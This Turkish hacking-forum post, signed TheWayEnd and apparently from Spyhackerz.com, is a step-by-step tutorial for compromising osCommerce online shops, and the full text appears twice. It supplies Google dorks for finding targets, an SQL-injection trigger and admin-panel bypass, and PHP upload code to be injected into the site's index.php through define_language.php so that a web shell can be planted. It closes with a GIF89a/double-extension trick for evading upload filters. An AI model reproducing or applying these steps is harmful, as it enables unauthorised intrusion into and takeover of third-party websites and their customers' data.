T
TheWayEnd
NOT:Alıntı Değildir.
Merhaba Arkadaşlar
Eskide olsa hala bu açık tek tükte olsa var lakin bir kaç püf nokta var bilinmeyen
upload açığı dışında sql açığı var bilindiği gibi fakat bunu değişik kullanmayı ve siteye shell upload etmeyi anlatayım.
dork: index.php?osCsid=
dork: index.php?cPath=
dork çok ben basitçe yazdım yukarıda
exploit : admin/geo_zones.php?action=list&zID=1
http://site/admin/geo_zones.php?action=list&zID=1'
Yukardaki linkte sql hatası alınıyor ve normalde burdan user bilgileri çekiliyor ama çekmeye gerek yok.
Bu hatayı aldıktan sonra
http://site/admin/index.php
direk panele girilebiliyor.
panele girdikten sonra genelde shelli images klasörüne upload etmeyi deniyorlar shell hata verince txt atıp geçiliyor.
File manager girilip dosya eklenebiliyor ama artık çoğunda file manager yok
http://site/admin/file_manager.php
işte burada define_language.php dosyasına gidiyoruz.
http://site/admin/define_language.php
burda dosyaları görüceksiniz benim taktiğim
index.php dosyasına giriyorum (Çoğunlukla yazma izni oluyor)
http://site/admin/define_language.php?lngdir=english&filename=index.php
Burda içeriyi silmeden Dizinin en üstene upload kodu yazıyoruz.
<?php
echo '<b>TheWayEnd<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="hidden" name="osCAdminID" value="473020022d9e866fb96f8736dda7a42d" />';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
Kaydedip ana sayfaya geçin http://site/
Sayfanın en üstünde TheWayEnd görünecek ve Gözat çıkacak ordan sheli upload edebilirsiniz.
http://site/sheliniz.php
daha sonra
http://site/admin/define_language.php?lngdir=english&filename=index.php
Upload kodunu silip kaydedin ve shelinize geçin gerisi size kalmış.
NOT: Bazen shell uploadlarında hata verir yani upload yapmaz bu durumda shelinizin başına GIF89a;
yazıp shell.php.jpg olarak kaydedip upload edin %90 yer.
Hadi kolay gelsin
TheWayEnd Spyhackerz.com
Merhaba Arkadaşlar
Eskide olsa hala bu açık tek tükte olsa var lakin bir kaç püf nokta var bilinmeyen
upload açığı dışında sql açığı var bilindiği gibi fakat bunu değişik kullanmayı ve siteye shell upload etmeyi anlatayım.
dork: index.php?osCsid=
dork: index.php?cPath=
dork çok ben basitçe yazdım yukarıda
exploit : admin/geo_zones.php?action=list&zID=1
http://site/admin/geo_zones.php?action=list&zID=1'
Yukardaki linkte sql hatası alınıyor ve normalde burdan user bilgileri çekiliyor ama çekmeye gerek yok.
Bu hatayı aldıktan sonra
http://site/admin/index.php
direk panele girilebiliyor.
panele girdikten sonra genelde shelli images klasörüne upload etmeyi deniyorlar shell hata verince txt atıp geçiliyor.
File manager girilip dosya eklenebiliyor ama artık çoğunda file manager yok
http://site/admin/file_manager.php
işte burada define_language.php dosyasına gidiyoruz.
http://site/admin/define_language.php
burda dosyaları görüceksiniz benim taktiğim
index.php dosyasına giriyorum (Çoğunlukla yazma izni oluyor)
http://site/admin/define_language.php?lngdir=english&filename=index.php
Burda içeriyi silmeden Dizinin en üstene upload kodu yazıyoruz.
<?php
echo '<b>TheWayEnd<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="hidden" name="osCAdminID" value="473020022d9e866fb96f8736dda7a42d" />';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
Kaydedip ana sayfaya geçin http://site/
Sayfanın en üstünde TheWayEnd görünecek ve Gözat çıkacak ordan sheli upload edebilirsiniz.
http://site/sheliniz.php
daha sonra
http://site/admin/define_language.php?lngdir=english&filename=index.php
Upload kodunu silip kaydedin ve shelinize geçin gerisi size kalmış.
NOT: Bazen shell uploadlarında hata verir yani upload yapmaz bu durumda shelinizin başına GIF89a;
yazıp shell.php.jpg olarak kaydedip upload edin %90 yer.
Hadi kolay gelsin
TheWayEnd Spyhackerz.com
Last edited by a moderator: